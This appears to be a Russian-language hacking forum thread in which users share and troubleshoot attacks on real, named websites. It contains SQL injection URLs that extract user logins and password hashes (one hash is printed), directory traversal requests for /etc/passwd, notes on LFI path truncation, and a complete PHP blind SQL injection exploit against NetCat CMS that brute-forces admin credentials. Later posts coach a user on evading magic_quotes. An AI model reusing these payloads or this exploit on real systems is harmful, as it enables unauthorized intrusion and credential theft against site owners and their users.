А вообще интересно, если у кого-то есть желание, пошарьтесь по шеллам, потестируйте. До конца зависимости так и не понятны

может кто-то докавыряет дальше...


Дальше это куда куда ?) Вот юзера форума

http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x2F,username,user_pa ssword),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1

FreeBSD
http://4ertim.com/autohtml.php?filename=ololololololo/../../../../../../../etc/passwd

ElteRUS, спасибо
не посмотрел, что там форум пхпббешный стоит, поэтому и таблицу подобрать не смог :)

FreeBSD
http://4ertim.com/autohtml.php?filename=ololololololo/../../../../../../../etc/passwd А если в сорцах путь относительный?

А вообще интересно, если у кого-то есть желание, пошарьтесь по шеллам, потестируйте. До конца зависимости так и не понятны
FreeBSD 6.3-RELEASE-p2
include('asd/../../../../../../../../../home/u*****/********/www/robots.txt');
include('/asd/../../../../../../../../../home/u*****/********/www/robots.txt');
Оба работают.
FreeBSD 6.4-RELEASE
include('/asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess');
include('asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess');
Оба работают.
Linux 2.6.24.4-nmm2
include('/asd../../../../../../www/htdocs/w*******/robots.txt');
include('asd../../../../../../www/htdocs/w*******/robots.txt');
Оба работают.
Linux 2.4.33.2
include('asdasd../../../../../../../../../../home/user/www/index.html');
include('/asdasd../../../../../../../../../../home/user/www/index.html');
Пашет только второй.
Darwin 9.7.0
include('/asdasd../../../../../../etc/passwd');
include('asdasd../../../../../../etc/passwd');
Оба работают.

Вечером приду домой может еще посмотрю.

http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database())
вывод: 5.0.45:kitanaru@localhost:kitanaru
через infromation_schema.tables нашлось user_profile, два столбца: usuer_id и password.
Вывод значений не произошел. решил проверить, а есть ли в этой таблице записи?
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,count(*)+from+user_profile
Оказалось ноль..

затем нашел таблицу personal
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,psw)+fro m+personal+limit+0,1
ALLA:bee7a699d0bd762b85db6deaca1c5f40
всего три учетки... limit+1,1 и +limit+2,1

AlexSatter, и?

Я не понимаю.
Было же
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
значит код примерно такой:
require_once("config".$value.".php");
значит если передать параметр value равный "../../../../etc/passwd%00", то в скрипте включится файл /var/www/site/htdocs/config../../../../etc/passwd
Значит инклуд пройдёт, только если в папке htdocs есть папка config и мы добавим к значению value ещё "../" и никак иначе.

А если передать значение параметра value равное "/././././.[4096 символов '/.']/etc/passwd%00" (что, наверное, и имелл в виду jokester, ссылаясь на пост [Raz0r]a), то скриптом подключится файл /var/www/site/htdocs/config

Что разве не так?
Я запарился всё это писать только чтоб понять о чём вы тут говорите :)

Я не понимаю.
Было же

значит код примерно такой:

значит если передать параметр value равный "../../../../etc/passwd%00", то в скрипте включится файл /var/www/site/htdocs/config../../../../etc/passwd
Значит инклуд пройдёт, только если в папке htdocs есть папка config и мы добавим к значению value ещё "../" и никак иначе.

А если передать значение параметра value равное "/././././.[4096 символов '/.']/etc/passwd%00" (что, наверное, и имелл в виду jokester, ссылаясь на пост [Raz0r]a), то скриптом подключится файл /var/www/site/htdocs/config

Что разве не так?
Я запарился всё это писать только чтоб понять о чём вы тут говорите :)
Да ты всё так понял, что я пыталься объяснить
Тока вот папки config нету(
есть файл config.php

Значит инклуд пройдёт, только если в папке htdocs есть папка config и мы добавим к значению value ещё "../" и никак иначе.
Ложь... Есть или нету этой папки - инклюд произведется, если только мэджики выключены.

нет, не так

мы тут говорим о том что не всегда можно выполнить переход вверх из несуществующей папки. В твоём случае папки config не существует

А про слеши это всего лишь пример, где Рейзор говорит что для линуха обязательно нужна существующая папка. Но как я говорил в той теме, так и в этой, в некоторых версиях пшп (достоверно неизвестно), папка не обязательно должна существовать

нет, не так

мы тут говорим о том что не всегда можно выполнить переход вверх из несуществующей папки. В твоём случае папки config не существует

А про слеши это всего лишь пример, где Рейзор говорит что для линуха обязательно нужна существующая папка. Но как я говорил в той теме, так и в этой, в некоторых версиях пшп (достоверно неизвестно), папка не обязательно должна существовать
Да, где-то тоже о таком читал, но везде, где я не пробовал - папка не обязательна... Мб это просто удачные совпадения.

в этих делах случайного имхо не бывает
всему есть свои объяснения

Сушествования папки не обязатель, попробуй у себя на локалке, php будет игноривать путь где мы подымаемься вверх с помошью /../ и нам все равно есть такая папка или нет перед 1 поднятием вверх.

PaCo, не всегда
ты читать умеешь?

Нужно, чтоб в include_path (в php.ini) хотя бы один абсолютный путь был прописан, тогда можно проэксплуатировать такой LFI. (;

add: Я это о способе проведения LFI через path truncation attack (http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/) написал, если что. (:

Народ помогите.
Есть движок NetCat CMS. Версия предположительно 3.0
Есть SQL-inj, которая позволяет вытащить логин/пасс админа посимвольным перебором.
Есть сплоит.
Для работы нужно PECL_HTTP
<?

/*
AIST NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]
Versions affected <= 3.12

More info: http://www.netcat.ru/

* tested on version 3.0, 3.12

usage:

# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID

The options are required:
-u The user identifier (number in table)
-s Target for exploiting

example:

# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2

[+] Phase 1 brute login.
[+] Brute 1 symbol...
...........a
[+] Brute 2 symbol...
..............d
[+] Brute 3 symbol...
.......................m
[+] Brute 4 symbol...
...................i
[+] Brute 5 symbol...
........................n
[+] Brute 6 symbol...
.....................................
[+] Phase 1 successfully finished: admin
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
*
[+] Brute 2 symbol...
.0
[+] Brute 3 symbol...
.0
[+] Brute N symbol...

<...>

[+] Brute 42 symbol...
.....................................
[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9


[+] Exploiting is finished successfully
[+] Login - admin
[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
[+] Decrypt MySQL hash and login into NetCat CMS.

*/


function http_connect($query)
{

global $server;

$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $server
);

$res_http = new HttpRequest($server."modules/poll/?cc=62&PollID=1".$query, HttpRequest::METH_GET);
$res_http->addHeaders($headers);

$t = mktime();
try {
$response = $res_http->send()->getBody();

$t = mktime() - $t;

if ($t > 4)
{
return 1;
}
else
{
return 0;
}

} catch (HttpException $exception) {

print "[-] Not connected";
exit(0);

}

}

function brute($User_id,$table)
{
$ret_str = "";

if ($table == "Password")
{
$b_str = "*1234567890abcdef";
}
else
{
$b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\]^{|}~абвгдежзийклмнопрстуфх� �чшщъыьэюяё";
}

$b_arr = str_split($b_str);

for ($i=1;$i<43;$i++)
{
print "[+] Brute $i symbol...\n";

for ($j=0;$j<count($b_arr);$j++)
{
$brute = ord($b_arr[$j]);
$q = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$brute,benchmark(1,benchmark( 2000000,md5(now()))),0)";

if (http_connect($q))
{
$ret_str=$ret_str.$b_arr[$j];
print $b_arr[$j]."\n";
break;
}
print ".";


}

if ($j == count($b_arr)) break;
}

return $ret_str;
}


function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -s=NetCat_server -u=User_ID

The options are required:
-u The user identifier (number in table)
-s Target for exploiting

example:

# ./".$script_name." -s=http://localhost/netcat/ -u=1
[+] Phase 1 brute login.
[+] Brute 1 symbol...
..1
[+] Brute 2 symbol...
.....................................
[+] Phase 1 successfully finished: 1
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
.....................................
[+] Phase 2 successfully finished:


[+] Exploiting is finished successfully
[+] Login - 1
[+] MySQL hash -
[+] You can login into NetCat CMS with the empty password
";
}

function successfully($login,$hash)
{
print "

[+] Exploiting is finished successfully
[+] Login - $login
[+] MySQL hash - $hash
";

if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
else print "[+] You can login into NetCat CMS with the empty password\n";

}

if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}

if ($ARG[s] && $ARG)
{
$server = $ARG[s];
$User_id = intval($ARG[u]);
$User_id--;

print "[+] Phase 1 brute login.\n";
$login = brute($User_id,"Login");
print "\n[+] Phase 1 successfully finished: $login\n";

print "[+] Phase 2 brute password-hash.\n";
$hash = brute($User_id,"Password");
print "\n[+] Phase 2 successfully finished: $hash\n";

successfully($login,$hash);
}
else
{
help_argc($argv[0]);
exit(0);
}

}

?>

Там, как я понял специально сделали ошибки.
Я исправил так:

<?
...
function brute($User_id,$table) {
...
$q = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/WHERE/**/[U]User_ID=$User_id/**/limit/**/0,1),$i,1))))=$brute,benchmark(1,benchmark(2000000 ,md5(now()))),0)";
...
}
...
function successfully($login,$hash)
{
...
// $User_id--;
...
}
?>

Но всё равно не пашет. Коннектится к хосту, пишет, что перебирает логин...................... пасс.............. и выдаёт, что всё подобрал:
логин пустой и пасс пустой.
:(((

Делаю такой запрос:
http://www.xxx.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,column_name,7,8+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LI MIT+1,1/*

А в ответ мне дулю вот такую:

Error in query 2 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' LIMIT 1,1/* and rs.status='1' and r.id=rs.id_rubric' at line 4

wtf, товарищи? что не так? Может кавычка не та? ))

2 4adr0s
стоят магик_квотесы, экранируются кавычки, нужно захексить
+WHERE+TABLE_NAME=0x7573657273+limit+1,1/*

2 4adr0s
стоят магик_квотесы, экранируются кавычки, нужно захексить
+WHERE+TABLE_NAME=0x7573657273+limit+1,1/*

Не канает, родной :(



Error in query 2 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* and rs.status='1' and r.id=rs.id_rubric' at line 4

и так тоже ('users')
+WHERE+TABLE_NAME=0x27757365727327+limit+1,1/*

не канает...

4adr0s
Ты читать умеешь? А поиском пользоваться?
Переведи ошибку, или хотя-бы просто ПОСМОТРИ на неё там написано. что комментарий не тот "/*"
Точнее ошибка, возле комментария. Так поменяй его. Или дай линк, зачем это гадание нужно

Есть закреплённая тема в которой все такие вопросы собраны, они уже 200 раз задавались

4adr0s
Ты читать умеешь? А поиском пользоваться?
Переведи ошибку, или хотя-бы просто ПОСМОТРИ на неё там написано. что комментарий не тот "/*"
Точнее ошибка, возле комментария. Так поменяй его. Или дай линк, зачем это гадание нужно

Насяльника! Зачем ругаися? )

Понял, все сделал. Страница открылась, но нифига не вылезло.

http://www.***.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,column_name,7,8+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x27757365 727327+LIMIT+1,1+--

Насяльника! Зачем ругаися? )

Понял, все сделал. Страница открылась, но нифига не вылезло.

http://www.***.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,column_name,7,8+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x27757365 727327+LIMIT+1,1+--
А темку мою поленился почитать, да? А там написано, что в хексе кавычки не нужны :)

https://forum.antichat.ru/thread104591.html
Вопрос №4

Держи
http://www.***.com/index.phtml?page=news&id=-1+union+select+column_name,2,3,4,5,6,7,8+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x75736572 73+LIMIT+1,1--+

Сенсей, эту тему в глаза не видел, но теперь почитаю.

Т.е. все дело было в том, чтобы использовать другое поле для вывода??

Сенсей, эту тему в глаза не видел, но теперь почитаю.

Т.е. все дело было в том, чтобы использовать другое поле для вывода??

дело было в том, что когда ты искал наблицу, т.е. where table_name, ты в hex закодировал имя таблицы+', а надо без кавычек.